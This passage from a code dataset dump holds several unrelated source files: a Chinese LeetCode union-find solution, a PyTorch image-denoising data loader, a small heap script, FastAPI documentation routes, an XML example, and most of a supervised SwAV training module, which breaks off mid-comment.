或空格构成。这些字符会将方块划分为一些共边的区域。\n\n(请注意,反斜杠字符是转义的,因此 \\ 用 \"\\\\\" 表示。)。\n\n返回区域的数目。\n\n\n\n示例 1:\n\n输入:\n[\n \" /\",\n \"/ \"\n]\n输出:2\n解释:2x2 网格如下:\n\n示例 2:\n\n输入:\n[\n \" /\",\n \" \"\n]\n输出:1\n解释:2x2 网格如下:\n\n示例 3:\n\n输入:\n[\n \"\\\\/\",\n \"/\\\\\"\n]\n输出:4\n解释:(回想一下,因为 \\ 字符是转义的,所以 \"\\\\/\" 表示 \\/,而 \"/\\\\\" 表示 /\\。)\n2x2 网格如下:\n\n示例 4:\n\n输入:\n[\n \"/\\\\\",\n \"\\\\/\"\n]\n输出:5\n解释:(回想一下,因为 \\ 字符是转义的,所以 \"/\\\\\" 表示 /\\,而 \"\\\\/\" 表示 \\/。)\n2x2 网格如下:\n\n示例 5:\n\n输入:\n[\n \"//\",\n \"/ \"\n]\n输出:3\n解释:2x2 网格如下:\n\n\n\n提示:\n\n1 <= grid.length == grid[0].length <= 30\ngrid[i][j] 是 '/'、'\\'、或 ' '。\n'''\n\n\n\nclass Solution(object):\n def regionsBySlashes(self, grid):\n \"\"\"\n :type grid: List[str]\n :rtype: int\n \"\"\"\n length = len(grid)\n p = {(i, j): (i, j) for j in range(length) for i in range(length)}\n\n for i in range(length+1):\n p[(i, 0)], p[(0, i)], p[(length, i)], p[(i, length)] = (0, 0), (0, 0), (0, 0), (0, 0)\n\n def find(x):\n px = p[x]\n if px != x:\n px = find(p[x])\n return px\n\n def union(x, y):\n px = find(x)\n py = find(y)\n if px != py:\n p[px] = py\n return False\n return True\n\n res = 1\n for i in range(length):\n for j in range(length):\n if grid[i][j] == \"/\":\n if union((i+1, j), (i, j+1)):\n res += 1\n elif grid[i][j] == \"\\\\\":\n if union((i+1, j+1), (i, j)):\n res += 1\n\n return res\n\n\n# solutions\n\n'''\n方法一:并查集\n我们沿着一个网格的两条对角线,能够将正方形切分成四个三角形。如果网格上的字符为 /,则右下角的两个三角形会与左上角的两个三角形分隔开;同理,如果字符为 \\,则右上角的两个三角形会和左下角的两个三角形分隔开。\n\n不难发现,如果将每个三角形看作为一张图上的节点,则网格中的一个共边区域,就相当于图中的一个连通分量。因此,不难想到利用并查集求解连通分量的数目。\n\n设网格为 n \\times nn×n 大小,则图中有 4n^24n \n2\n 个节点,每个格子对应其中的 44 个节点。对于每个格子而言,考虑当前位置的字符:\n\n如果为空格,则该格子对应的 44 个节点应当同属于同一区域,因此在它们之间各连接一条边;\n\n如果为字符 /,则将左上角的两个格子连接一条边,并将右下角的两个格子连接一条边;\n\n如果为字符 \\,则将右上角的两个格子连接一条边,并将左下角的两个格子连接一条边。\n\n到目前位置,我们只考虑了一个格子内部的情况。但同时,不难观察到下面两点:\n\n一个格子中最下方的三角形,必然和下面的格子(如果存在)中最上方的三角形连通;\n\n一个格子中最右方的三角形,必然和右边的格子(如果存在)中最左方的三角形连通。\n\n因此,我们还需要根据上面两条规则,在相邻格子的相应三角形中间,再连接边。\n\n最终,在构造出图后,利用并查集就可以求出连通分量的数目了。\n\n具体实现方面,每个格子的 44 个节点按照上、右、下、左的顺序依次编号 00、11、22、33,每个节点可以根据格子所在的行和列以及节点在格子中的编号唯一地确定。\n\nC++JavaJavaScriptGolangC\n\ntype unionFind struct {\n parent, size []int\n setCount int // 当前连通分量数目\n}\n\nfunc newUnionFind(n int) *unionFind {\n parent := make([]int, n)\n size := make([]int, n)\n for i := range parent {\n parent[i] = i\n size[i] = 1\n }\n return &unionFind{parent, size, n}\n}\n\nfunc (uf *unionFind) find(x int) int {\n if uf.parent[x] != x {\n uf.parent[x] = uf.find(uf.parent[x])\n }\n return uf.parent[x]\n}\n\nfunc (uf *unionFind) union(x, y int) {\n fx, fy := uf.find(x), uf.find(y)\n if fx == fy {\n return\n }\n if uf.size[fx] < uf.size[fy] {\n fx, fy = fy, fx\n }\n uf.size[fx] += uf.size[fy]\n uf.parent[fy] = fx\n uf.setCount--\n}\n\nfunc regionsBySlashes(grid []string) int {\n n := len(grid)\n uf := newUnionFind(4 * n * n)\n for i := 0; i < n; i++ {\n for j := 0; j < n; j++ {\n idx := i*n + j\n if i < n-1 {\n bottom := idx + n\n uf.union(idx*4+2, bottom*4)\n }\n if j < n-1 {\n right := idx + 1\n uf.union(idx*4+1, right*4+3)\n }\n if grid[i][j] == '/' {\n uf.union(idx*4, idx*4+3)\n uf.union(idx*4+1, idx*4+2)\n } else if grid[i][j] == '\\\\' {\n uf.union(idx*4, idx*4+1)\n uf.union(idx*4+2, idx*4+3)\n } else {\n uf.union(idx*4, idx*4+1)\n uf.union(idx*4+1, idx*4+2)\n uf.union(idx*4+2, idx*4+3)\n }\n }\n }\n return uf.setCount\n}\n复杂度分析\n\n时间复杂度:O(n^2\\log n)O(n \n2\n logn),其中 nn 是网格的边长。仅使用路径压缩的并查集的复杂度为 O(n^2\\log n^2)=O(n^2\\times 2\\log n)=O(n^2\\log n)O(n \n2\n logn \n2\n )=O(n \n2\n ×2logn)=O(n \n2\n logn)。\n\n空间复杂度:O(n^2)O(n \n2\n )。\n\n作者:LeetCode-Solution\n链接:https://leetcode-cn.com/problems/regions-cut-by-slashes/solution/you-xie-gang-hua-fen-qu-yu-by-leetcode-s-ztob/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n'''\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/union_find_set/leetcode-959-RegionsCutBySlashes.py","file_name":"leetcode-959-RegionsCutBySlashes.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18799901984","text":"import torchvision.transforms.functional as tvF\nfrom torch.utils.data import Dataset, DataLoader\n\nimport os\nimport torch\nimport numpy as np\nfrom PIL import Image\n\n\ndef load_dataset(root_dir, redux, params, shuffled=False, single=False, normalized=True):\n noise = (params.noise_type, params.noise_param)\n\n dataset = NoisyDataset(root_dir, redux, params.crop_size,\n clean_targets=params.clean_targets, noise_dist=noise, seed=params.seed)\n\n if single: # use if testing to only load one image\n return DataLoader(dataset, batch_size=1, shuffle=shuffled)\n else:\n return DataLoader(dataset, batch_size=params.batch_size, shuffle=shuffled)\n\n\nclass AbstractDataset(Dataset):\n def __init__(self, root_dir, redux=0, crop_size=128, clean_targets=False):\n super(AbstractDataset, self).__init__()\n\n self.imgs = []\n self.root_dir = root_dir\n self.redux = redux\n self.crop_size = crop_size\n self.clean_targets = clean_targets\n\n def __getitem__(self, index):\n \"\"\"Retrieves image from data folder.\"\"\"\n\n raise NotImplementedError('Abstract method not implemented!')\n\n def __len__(self):\n \"\"\"Returns length of dataset.\"\"\"\n\n return len(self.imgs)\n\n\nclass NoisyDataset(AbstractDataset):\n\n def __init__(self, root_dir, redux, crop_size, clean_targets=False, noise_dist=('gaussian', 50.), seed=None):\n super(NoisyDataset, self).__init__(root_dir, redux, crop_size, clean_targets)\n\n self.imgs = os.listdir(root_dir)\n if redux:\n self.imgs = self.imgs[:redux]\n\n # Noise parameters (max std for Gaussian, lambda for Poisson)\n self.noise_type = noise_dist[0]\n self.noise_param = noise_dist[1]\n self.seed = seed\n if self.seed:\n np.random.seed(self.seed)\n\n def _add_noise(self, img):\n \"\"\"Adds Gaussian or Poisson noise to image.\"\"\"\n\n w, h = img.size\n c = len(img.getbands())\n\n # Poisson distribution\n # It is unclear how the paper handles this. Poisson noise is not additive,\n # it is data dependent, meaning that adding sampled valued from a Poisson\n # will change the image intensity...\n if self.noise_type == 'poisson':\n # high quality images typically have 10,000 photons per pixel\n # (https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4354036/)\n dispersion = 75 # chosen based on a distribution centered at ~450 with range ~100-1000\n photons_per_pixel = np.random.negative_binomial(self.noise_param / dispersion, 1 / self.noise_param) / self.noise_param * dispersion\n noise_img = np.random.poisson(np.array(img) / 255.0 * photons_per_pixel) / photons_per_pixel * 255\n\n elif self.noise_type == 'impulse':\n p = 0.2\n if self.seed:\n std = self.noise_param\n else:\n std = np.random.uniform(0, self.noise_param)\n noise = np.random.normal(0, std, (h, w, c))\n mask = np.random.uniform(0, 1, (h, w, c)) > p\n noise[mask] = 0\n noise_img = np.array(img) + noise\n\n # Normal distribution (default)\n else:\n if self.seed:\n std = self.noise_param\n else:\n std = np.random.uniform(0, self.noise_param)\n noise = np.random.normal(0, std, (h, w, c))\n noise_img = np.array(img) + noise\n\n noise_img = np.clip(noise_img, 0, 255).astype(np.uint8)\n return Image.fromarray(noise_img)\n\n def _corrupt(self, img):\n \"\"\"Corrupts images (Gaussian or Poisson).\"\"\"\n\n if self.noise_type in ['gaussian', 'poisson', 'impulse']:\n return self._add_noise(img)\n else:\n raise ValueError('Invalid noise type: {}'.format(self.noise_type))\n\n def __getitem__(self, index):\n \"\"\"Retrieves image from folder and corrupts it.\"\"\"\n\n # Load PIL image\n img_path = os.path.join(self.root_dir, self.imgs[index])\n img = Image.open(img_path).convert('RGB')\n\n # Corrupt source image\n tmp = self._corrupt(img)\n source = tvF.to_tensor(self._corrupt(img))\n\n # Corrupt target image, but not when clean targets are requested\n if self.clean_targets:\n target = tvF.to_tensor(img)\n else:\n target = tvF.to_tensor(self._corrupt(img))\n\n return source, target\n\n\nclass ToRGBTensor(object):\n \"\"\"\n Default ToTensor transform scale input to [0,1], this does not\n \"\"\"\n def __call__(self, x):\n # Convert from PIL image to numpy\n result = np.asarray(x)\n # Move axis to enforce same style as previous input\n result = np.moveaxis(result, -1, 0)\n # Convert from numpy to torch tensor\n result = torch.from_numpy(result)\n return result","repo_name":"hauserkristen/adversarial_denoising","sub_path":"denoising/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40250661297","text":"from heapq import heappop, heappush\n\n\nn = int(input())\nlamps = []\nfor _ in range(n):\n lamps.append(list(map(int, input().split())))\nbenchs = list(map(int, input().split()))\n\npq = []\n\"\"\"\n1, Lamp on\n2, Bench\n3, Lamp off\n\"\"\"\nfor x, y in lamps:\n heappush(pq, (x, 1))\n heappush(pq, (y, 3))\n\nfor bench in benchs:\n heappush(pq, (bench, 2))\n\nlights = 0\nresult = []\nwhile pq:\n v, t = heappop(pq)\n if t == 1:\n lights += 1\n elif t == 2:\n result.append(lights)\n elif t == 3:\n lights -= 1\nprint(*result)","repo_name":"Naboni/Competitive-Programming","sub_path":"OA/lamps_and_bench.py","file_name":"lamps_and_bench.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75001539573","text":"from fastapi.openapi.docs import get_swagger_ui_html\nfrom fastapi import Depends, Response, Request\nfrom fastapi.responses import ORJSONResponse\nfrom fastapi.openapi.utils import get_openapi\n\nfrom framework.docs.metadata import OpenAPIMetadata\nfrom framework.middleware.authentication import BasicAuth, SuperAdmin\n\n\nclass Documentation:\n\n def __init__(self, app):\n self.user = None\n self.load(app)\n\n def show_auth_dialog(self) -> Response:\n return Response(headers={\"WWW-Authenticate\": \"Basic\"}, status_code=401)\n\n def load(self, app):\n @app.get(\"/docs\", include_in_schema=False)\n async def custom_swagger_ui_html(request: Request):\n return get_swagger_ui_html(openapi_url=\"/openapi.json\", title=\"Docs\")\n\n @app.get(\"/openapi.json\", include_in_schema=False, dependencies=[Depends(SuperAdmin)])\n async def get_open_api_endpoint():\n return ORJSONResponse(get_openapi(\n title=\"PRINTER24 API\",\n version=\"1.0.0\",\n routes=app.routes,\n description=OpenAPIMetadata.description,\n tags=OpenAPIMetadata.tags_metadata\n ))\n\n @app.get(\"/docs/login\", include_in_schema=False)\n async def docs_auth(auth: BasicAuth = Depends(BasicAuth(auto_error=False))):\n if not auth:\n response = Response(headers={\"WWW-Authenticate\": \"Basic\"}, status_code=401)\n return response\n\n def validate(self, token):\n pass\n","repo_name":"broluja/Printer24","sub_path":"framework/docs/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26831900440","text":"import xml.etree.ElementTree as ET\n\nroot = ET.Element(\"data\")\nmovie_1 = ET.SubElement(root, \"movie\", {\"title\": \"The Little Prince\", \"rate\": \"5\"})\nmovie_2 = ET.SubElement(root, \"movie\", {\"title\": \"Hamlet\", \"rate\": \"5\"})\n\n# dump() allows us to debug either the whole tree or a single element\nET.dump(root)\n\n# ElementTree object allows us to save a document by write method\ntree = ET.ElementTree(root)\n","repo_name":"yukikitayama/python","sub_path":"file/build_xml.py","file_name":"build_xml.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37872962225","text":"\"\"\"\r\nAdapted from official swav implementation: https://github.com/facebookresearch/swav\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport ast\r\nfrom argparse import ArgumentParser, Action\r\nfrom time import sleep\r\nimport math\r\nfrom collections import OrderedDict\r\n\r\nimport numpy as np\r\nimport pytorch_lightning as pl\r\nimport torch\r\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\r\nfrom torch import distributed as dist\r\nfrom torch import nn\r\nfrom torch.utils import model_zoo\r\nimport torch.nn.functional as F\r\nfrom torchmetrics import Accuracy\r\n\r\nfrom pl_bolts.optimizers.lars import LARS\r\nfrom pl_bolts.transforms.dataset_normalizations import (\r\n cifar10_normalization,\r\n imagenet_normalization,\r\n stl10_normalization,\r\n)\r\nfrom pytorch_lightning.utilities.cloud_io import load as load_checkpoint\r\n\r\ntry:\r\n from supervised_swav_resnet import resnet18, resnet50, ResNet, BasicBlock\r\nexcept:\r\n from .supervised_swav_resnet import resnet18, resnet50, ResNet, BasicBlock\r\n\r\nmodel_urls = {\r\n 'resnet18': 'https://download.pytorch.org/models/resnet18-f37072fd.pth',\r\n 'resnet34': 'https://download.pytorch.org/models/resnet34-b627a593.pth',\r\n 'resnet50': 'https://download.pytorch.org/models/resnet50-0676ba61.pth', # from Mar 2021\r\n 'resnet50_old': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', # from Jan 2017, used in e.g. FixBi\r\n 'resnet101': 'https://download.pytorch.org/models/resnet101-63fe2227.pth',\r\n 'resnet152': 'https://download.pytorch.org/models/resnet152-394f9c45.pth',\r\n 'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',\r\n 'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',\r\n 'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',\r\n 'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',\r\n}\r\n\r\ndef linear_warmup_decay(warmup_steps, total_steps, decay_type='cosine', alpha=10, beta=0.75):\r\n assert decay_type in ['constant', 'cosine', 'linear', 'inv_prop']\r\n\r\n def fn(step):\r\n if step < warmup_steps:\r\n return float(step) / float(max(1, warmup_steps))\r\n\r\n if decay_type == 'constant':\r\n # no decay\r\n return 1.0\r\n\r\n progress = float(step - warmup_steps) / float(max(1, total_steps - warmup_steps))\r\n if decay_type == 'cosine':\r\n # cosine decay\r\n return 0.5 * (1.0 + math.cos(math.pi * progress))\r\n elif decay_type == 'inv_prop':\r\n # \"inversly proportional\" decay\r\n return (1 + alpha*progress)**-beta\r\n else:\r\n # linear decay\r\n return 1.0 - progress\r\n\r\n return fn\r\n\r\nclass SupervisedSwAV(pl.LightningModule):\r\n\r\n def __init__(\r\n self,\r\n gpus: int,\r\n num_samples: int,\r\n batch_size: int,\r\n dataset: str,\r\n num_classes: int,\r\n supervised_hidden_mlp: int = 2048,\r\n supervised_weight: float = 1.,\r\n share_hidden_mlp: bool = False,\r\n supervised_head_after_proj_head: bool = False,\r\n imagenet_pretrained: bool = False,\r\n old_pretrained_weights: bool = False,\r\n pretrained_checkpoint: str = None,\r\n backbone_lr_scaling: float = 1.0,\r\n val_names: list = None,\r\n num_nodes: int = 1,\r\n arch: str = 'resnet50',\r\n hidden_mlp: int = 2048,\r\n feat_dim: int = 128,\r\n warmup_epochs: int = 10,\r\n max_epochs: int = 100,\r\n nmb_prototypes: int = 3000,\r\n freeze_prototypes_epochs: int = 1,\r\n temperature: float = 0.1,\r\n sinkhorn_iterations: int = 3,\r\n queue_length: int = 0, # must be divisible by total batch-size\r\n epoch_queue_starts: int = 15,\r\n crops_for_assign: list = [0, 1],\r\n nmb_crops: list = [2, 6],\r\n first_conv: bool = True,\r\n maxpool1: bool = True,\r\n norm_layer: str = 'batch_norm',\r\n num_groups: int = 16,\r\n optimizer: str = 'adam',\r\n start_lr: float = 0.,\r\n learning_rate: float = 1e-3,\r\n final_lr: float = 0.,\r\n lr_schedule_type: str = 'cosine',\r\n weight_decay: float = 1e-6,\r\n epsilon: float = 0.05,\r\n prototype_entropy_regularization_weight: float = 1.,\r\n prototype_entropy_regularization_type: str = 'separate_optimizer',\r\n supervised_contrastive: bool = False,\r\n **kwargs\r\n ):\r\n \"\"\"\r\n Args:\r\n gpus: number of gpus per node used in training, passed to SwAV module\r\n to manage the queue and select distributed sinkhorn\r\n num_nodes: number of nodes to train on\r\n num_samples: number of image samples used for training\r\n batch_size: batch size per GPU in ddp\r\n dataset: dataset being used for train/val\r\n num_classes: number of classes in the dataset\r\n supervised_hidden_mlp: hidden layer of non-linear supervised learning head,\r\n set to 0 to use a linear projection head\r\n supervised_weight: weighting factor to multiply supervised loss with\r\n before adding it to the total loss\r\n share_hidden_mlp: Whether supervised head and swav's projection head should share their hidden layer. If this is set to True,\r\n `supervised_hidden_mlp` will have no effect, and `hidden_mlp` will define the size of the hidden layer used by both heads.\r\n imagenet_pretrained: Whether to initialize the weights of the backbone to values pretrained on imagenet\r\n old_pretrained_weights: If `imagenet_pretrained` is true: whether to use older pretrained weights from Jan 2017, or newer ones from Mar 2021.\r\n Otherwise: no effect.\r\n pretrained_checkpoint: checkpoint to load pretrained weights from. If none is provided, one from pytorch's model_zoo will be used\r\n val_names: in case of multiple validation dataloaders, this list should\r\n contain names identifying them (in the same order)\r\n arch: encoder architecture used for pre-training\r\n hidden_mlp: hidden layer of non-linear projection head, set to 0\r\n to use a linear projection head\r\n feat_dim: output dim of the projection head\r\n warmup_epochs: apply linear warmup for this many epochs\r\n max_epochs: epoch count for pre-training\r\n nmb_prototypes: count of prototype vectors\r\n freeze_prototypes_epochs: epoch till which gradients of prototype layer\r\n are frozen\r\n temperature: loss temperature\r\n sinkhorn_iterations: iterations for sinkhorn normalization\r\n queue_length: set queue when batch size is small,\r\n must be divisible by total batch-size (i.e. total_gpus * batch_size),\r\n set to 0 to remove the queue\r\n epoch_queue_starts: start uing the queue after this epoch\r\n crops_for_assign: list of crop ids for computing assignment\r\n nmb_crops: number of global and local crops, ex: [2, 6]\r\n first_conv: keep first conv same as the original resnet architecture,\r\n if set to false it is replace by a kernel 3, stride 1 conv (cifar-10)\r\n maxpool1: keep first maxpool layer same as the original resnet architecture,\r\n if set to false, first maxpool is turned off (cifar10, maybe stl10)\r\n norm_layer: the type of normalization layer to use in the network (batch_norm or group_norm)\r\n num_groups: in case group_norm is chosen as norm_layer, this sets the number of groups\r\n optimizer: optimizer to use\r\n start_lr: starting lr for linear warmup\r\n learning_rate: learning rate\r\n final_lr: final learning rate for cosine weight decay\r\n lr_schedule_type: type of learning rate schedule to use (constant, linear, cosine or inv_prop)\r\n weight_decay: weight decay for optimizer\r\n epsilon: epsilon val for swav assignments\r\n supervised_head_after_proj_head: Whether to change the architecture such that\r\n the supervised head attaches after swav's projection head and the l2norm\r\n backbone_lr_scaling: factor to scale the backbone learning rate with\r\n prototype_entropy_regularization_weight: weight of the prototype entropy regularization\r\n (0 for no regularization)\r\n prototype_entropy_regularization_type: type prototype entropy regularization\r\n (same_optimizer or separate_optimizer)\r\n supervised_contrastive: whether to use the supervised contrastive objective,\r\n using all samples of the same class as positives for the swav loss \r\n \"\"\"\r\n super().__init__()\r\n self.save_hyperparameters()\r\n\r\n if nmb_prototypes == 0 and prototype_entropy_regularization_weight != 0:\r\n raise ValueError('Prototype entropy regularization is not possible without prototypes')\r\n\r\n if not supervised_head_after_proj_head and prototype_entropy_regularization_weight != 0:\r\n raise ValueError('Prototype entropy regularization requires supervised_head_after_projection_head-architecture')\r\n\r\n if sum(nmb_crops) <= 1:\r\n raise ValueError('Need at least 2 crops to perform swapped prediction')\r\n\r\n self.gpus = gpus\r\n self.num_nodes = num_nodes\r\n self.arch = arch\r\n self.dataset = dataset\r\n self.num_samples = num_samples\r\n self.batch_size = batch_size\r\n\r\n self.hidden_mlp = hidden_mlp\r\n self.feat_dim = feat_dim\r\n self.nmb_prototypes = nmb_prototypes\r\n self.freeze_prototypes_epochs = freeze_prototypes_epochs\r\n self.sinkhorn_iterations = sinkhorn_iterations\r\n\r\n self.queue_length = queue_length\r\n self.epoch_queue_starts = epoch_queue_starts\r\n self.crops_for_assign = crops_for_assign\r\n self.nmb_crops = nmb_crops\r\n\r\n self.first_conv = first_conv\r\n self.maxpool1 = maxpool1\r\n self.norm_layer = norm_layer\r\n self.num_groups = num_groups\r\n\r\n self.optim = optimizer\r\n self.weight_decay = weight_decay\r\n self.epsilon = epsilon\r\n self.temperature = temperature\r\n\r\n self.start_lr = start_lr\r\n self.final_lr = final_lr\r\n self.learning_rate = learning_rate\r\n self.lr_schedule_type = lr_schedule_type\r\n self.warmup_epochs = warmup_epochs\r\n self.max_epochs = max_epochs\r\n\r\n self.supervised_hidden_mlp = supervised_hidden_mlp\r\n self.supervised_weight = supervised_weight\r\n self.num_classes = num_classes\r\n self.share_hidden_mlp = share_hidden_mlp\r\n self.supervised_head_after_proj_head = supervised_head_after_proj_head\r\n\r\n self.val_names = val_names\r\n self.imagenet_pretrained = imagenet_pretrained\r\n self.pretrained_checkpoint = pretrained_checkpoint\r\n self.old_pretrained_weights = old_pretrained_weights\r\n self.backbone_lr_scaling = backbone_lr_scaling\r\n\r\n self.prototype_entropy_regularization_weight = prototype_entropy_regularization_weight\r\n self.prototype_entropy_regularization_type = prototype_entropy_regularization_type\r\n\r\n self.supervised_contrastive = supervised_contrastive\r\n\r\n if self.gpus * self.num_nodes > 1:\r\n self.get_assignments = self.distributed_sinkhorn\r\n else:\r\n self.get_assignments = self.sinkhorn\r\n\r\n self.model = self.init_model()\r\n\r\n # compute iters per epoch\r\n global_batch_size = self.num_nodes * self.gpus * self.batch_size if self.gpus > 0 else self.batch_size\r\n self.train_iters_per_epoch = self.num_samples // global_batch_size\r\n\r\n self.queue = None\r\n self.use_the_queue = False\r\n self.softmax = nn.Softmax(dim=1)\r\n\r\n # metrics\r\n self.train_acc = Accuracy()\r\n if val_names:\r\n for name in val_names:\r\n setattr(self, f'{name}_val_acc', Accuracy(compute_on_step=False))\r\n else:\r\n self.val_acc = Accuracy(compute_on_step=False)\r\n self.test_acc = Accuracy(compute_on_step=False)\r\n\r\n def init_model(self):\r\n if self.arch == 'resnet18':\r\n backbone = resnet18\r\n initial_filters = 64\r\n elif self.arch == 'resnet18_w32':\r\n backbone = resnet18\r\n initial_filters = 32\r\n elif self.arch == 'resnet18_w16':\r\n backbone = resnet18\r\n initial_filters = 16\r\n elif self.arch == 'resnet50':\r\n backbone = resnet50\r\n initial_filters = 64\r\n elif self.arch == 'resnet50_w32':\r\n backbone = resnet50\r\n initial_filters = 32\r\n elif self.arch == 'resnet50_w16':\r\n backbone = resnet50\r\n initial_filters = 16\r\n elif self.arch == 'resnet32_w16':\r\n # the ResNet as used in the resnet paper (https://arxiv.org/pdf/1512.03385.pdf) for cifar10 classification, with n=5\r\n # note that they did not use a dense layer in the classifiation head, corresponding to self.supervised_hidden_mlp = 0\r\n backbone = lambda **kwargs: ResNet(BasicBlock, [5, 5, 5], **kwargs)\r\n initial_filters = 16\r\n elif self.arch == 'resnet26_w32':\r\n # as used in the MT3 paper\r\n backbone = lambda **kwargs: ResNet(BasicBlock, [4, 4, 4], **kwargs)\r\n initial_filters = 32\r\n else:\r\n raise ValueError('Invalid architecture name')\r\n\r\n if self.norm_layer == 'batch_norm':\r\n norm_layer = nn.BatchNorm2d\r\n elif self.norm_layer == 'group_norm':\r\n norm_layer = lambda num_channels: nn.GroupNorm(self.num_groups, num_channels)\r\n else:\r\n raise ValueError('Invalid norm layer name')\r\n\r\n model = backbone(\r\n num_classes=self.num_classes,\r\n supervised_hidden_mlp=self.supervised_hidden_mlp,\r\n share_hidden_mlp=self.share_hidden_mlp,\r\n width_per_group=initial_filters,\r\n norm_layer=norm_layer,\r\n normalize=True,\r\n hidden_mlp=self.hidden_mlp,\r\n output_dim=self.feat_dim,\r\n nmb_prototypes=self.nmb_prototypes,\r\n first_conv=self.first_conv,\r\n maxpool1=self.maxpool1,\r\n supervised_head_after_proj_head=self.supervised_head_after_proj_head,\r\n )\r\n if self.imagenet_pretrained:\r\n if self.arch != 'resnet50' or not self.first_conv or not self.maxpool1:\r\n raise ValueError('Pretrained weights are only available for the resnet50 with first_conv and maxpool1 = True')\r\n if self.pretrained_checkpoint is None:\r\n missing_keys, unexpected_keys = model.load_state_dict(model_zoo.load_url(model_urls['resnet50' + ('_old' if self.old_pretrained_weights else '')]), strict=False)\r\n else:\r\n checkpoint_state_dict = load_checkpoint(self.pretrained_checkpoint)['state_dict']\r\n # remove the prefix \"model.\" from keys, if present\r\n checkpoint_state_dict = OrderedDict([(k[6:], v) if k.startswith('model.') else (k, v) for k, v in checkpoint_state_dict.items()])\r\n missing_keys, unexpected_keys = model.load_state_dict(checkpoint_state_dict, strict=False)\r\n print('Missing keys while loading state dict:', missing_keys)\r\n print('Unexpected keys while loading state dict:', unexpected_keys)\r\n return model\r\n\r\n def forward(self, x):\r\n # pass single batch through resnet backbone and supervised head\r\n return self.model(x)\r\n\r\n def forward_backbone(self, x):\r\n # pass single batch from the resnet backbone\r\n return self.model.forward_backbone(x)\r\n\r\n def forward_embeddings(self, x):\r\n # pass single batch through resnet backbone and projection head (including normalization)\r\n result = self.model.forward_swav(x)\r\n return result[0] if isinstance(result, tuple) else result\r\n\r\n def get_prototypes(self):\r\n return self.model.prototypes.weight if self.model.prototypes is not None else None\r\n\r\n def on_train_epoch_start(self):\r\n if self.queue_length > 0:\r\n if self.trainer.current_epoch >= self.epoch_queue_starts and self.queue is None:\r\n self.queue = torch.zeros(\r\n len(self.crops_for_assign),\r\n self.queue_length // self.gpus, # change to nodes * gpus once multi-node\r\n self.feat_dim,\r\n )\r\n\r\n if self.gpus > 0:\r\n self.queue = self.queue.cuda()\r\n\r\n self.use_the_queue = False\r\n\r\n def on_after_backward(self):\r\n if self.current_epoch < self.freeze_prototypes_epochs:\r\n for name, p in self.model.named_parameters():\r\n if \"prototypes\" in name:\r\n p.grad = None\r\n\r\n def shared_step(self, batch, acc_metric): #, conf_mat):\r\n if self.dataset == 'stl10':\r\n unlabeled_batch = batch[0]\r\n batch = unlabeled_batch\r\n\r\n inputs, labels = batch\r\n\r\n # last element of inputs: batch used for supervised training\r\n # rest of the inputs: multicrop-batches for SwAV\r\n # if inputs contains only one element, only supervised learning is performed\r\n # if inputs contains exactly sum(self.nmb_crops) elements, only swav is performed\r\n # otherwise, an error is raised\r\n\r\n if len(inputs) not in (1, sum(self.nmb_crops), sum(self.nmb_crops) + 1):\r\n raise ValueError(\r\n f'Got inputs of invalid length {len(inputs)}, when either length 1 for supervised only, '\r\n f'length {sum(self.nmb_crops)} for swav only, or length {sum(self.nmb_crops) + 1} for both jointly was expected.'\r\n )\r\n\r\n swav_loss = 0\r\n\r\n if len(inputs) > 1:\r\n ## SwAV\r\n\r\n # 1. normalize the prototypes\r\n with torch.no_grad():\r\n w = self.model.prototypes.weight.data.clone()\r\n w = nn.functional.normalize(w, dim=1, p=2)\r\n self.model.prototypes.weight.copy_(w)\r\n\r\n # 2. multi-res forward passes\r\n if len(inputs) == sum(self.nmb_crops):\r\n # swav only\r\n embedding, output = self.model.forward_swav(inputs)\r\n else:\r\n # supervised + swav\r\n logits, (embedding, output) = self.model(inputs)\r\n embedding = embedding.detach()\r\n bs = inputs[0].size(0)\r\n\r\n # 3. swav loss computation\r\n for i, crop_id in enumerate(self.crops_for_assign):\r\n with torch.no_grad():\r\n out = output[bs * crop_id:bs * (crop_id + 1)]\r\n\r\n # 4. time to use the queue\r\n if self.queue is not None:\r\n if self.use_the_queue or not torch.all(self.queue[i, -1, :] == 0):\r\n self.use_the_queue = True\r\n out = torch.cat((torch.mm(self.queue[i], self.model.prototypes.weight.t()), out))\r\n # fill the queue\r\n self.queue[i, bs:] = self.queue[i, :-bs].clone()\r\n self.queue[i, :bs] = embedding[crop_id * bs:(crop_id + 1) * bs]\r\n\r\n # 5. get assignments\r\n q = torch.exp(out / self.epsilon).t()\r\n q = self.get_assignments(q, self.sinkhorn_iterations)[-bs:]\r\n\r\n # output = [crop_0_of_sample_0, crop_0_of_sample_1, ..., crop_1_of_sample_0, crop_1_of_sample_1, ..., ...]\r\n # <---------- crop 0 of the batch ---------->, <---------- crop 1 of the batch ---------->, ...\r\n\r\n # cluster assignment prediction\r\n if self.supervised_contrastive:\r\n p = self.softmax(output / self.temperature) # generate the p-term in the swav loss for all crops of all images in the batch\r\n\r\n # matrix of size (bs, sum(self.nmb_crops) * bs), which contains the potential losses for the prediction of all the cosine_similarites by all the assignments in the batch (for this crop)\r\n potential_sublosses = -torch.mm(q, torch.log(p).t())\r\n\r\n # the value at position i,j of this matrix defines, whether the i'th 